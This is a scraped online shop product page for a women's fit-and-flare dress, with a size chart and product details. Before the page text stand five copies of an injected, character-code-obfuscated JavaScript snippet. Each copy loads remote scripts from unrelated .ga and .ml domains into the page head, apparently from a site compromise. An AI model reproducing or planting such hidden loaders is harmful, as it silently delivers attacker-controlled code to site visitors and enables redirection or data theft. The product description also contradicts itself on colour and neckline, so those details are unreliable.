Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,109,111,110,111,46,100,101,99,108,97,114,101,98,117,115,105,110,101,115,115,103,114,111,117,112,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,111,108,111,46,100,101,99,108,97,114,101,98,117,115,105,110,101,115,115,103,114,111,117,112,46,103,97,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Women Fit and Flare Yellow Dress – Clorals

Women Fit and Flare Yellow Dress

2,250.00

Rust orange solid woven A-line dress with gotta patti detail, has a tie-up neck, sleeveless and flounce hem.

Dresses

Label SizeIndiaShoulderBustChestHipsWaist
XSX-Small13.534353931.5
SSmall1436364234
MMedium14.53938.54437
LLarge1542424740
XLX-Large15.544444942.5
XXLXX-Large1647475245
Clear
AW19CLRS3344 , ,
Product Details
Color: Yellow
Length: Knee Length
Fabric: Rayon
Pattern: Floral Print
Ideal For: Women
Type: Fit and Flare
Style Code: AW19CLRS3344
Suitable For: Western Wear
Pack of: 1
Neck: Halter Neck
Fabric Care: Hand Wach in Cold Water
Other Details: Mustard Floral Printed Dress, V-Neck, Pleated, Length Adjusters,
Sleeve: Shoulder Straps
Define your personality and go classy with this enchanting dress. The eye catching color and frilled strappy pattern of this dress is something which makes it unique. Having shoulder straps and Floral printed pattern makes it unique and different. It has V-Neck Strappy Floral printed and fit, flare pattern and knee length. Made of 100% Liva Rayon (Viscose) that will make you look comfortable all day long. This dress can be paired with classy accessories and heels that will complete your attire

Size

XS, S, M, L, XL

Reviews

There are no reviews yet.

Be the first to review “Women Fit and Flare Yellow Dress”

Your email address will not be published. Required fields are marked *

CiyaShop
Sign-up and get 20% EXTRA OFF on your first order.
Exceptional quality. Ethical brand. Radical transparency. Free shipping. Receive coupon in email.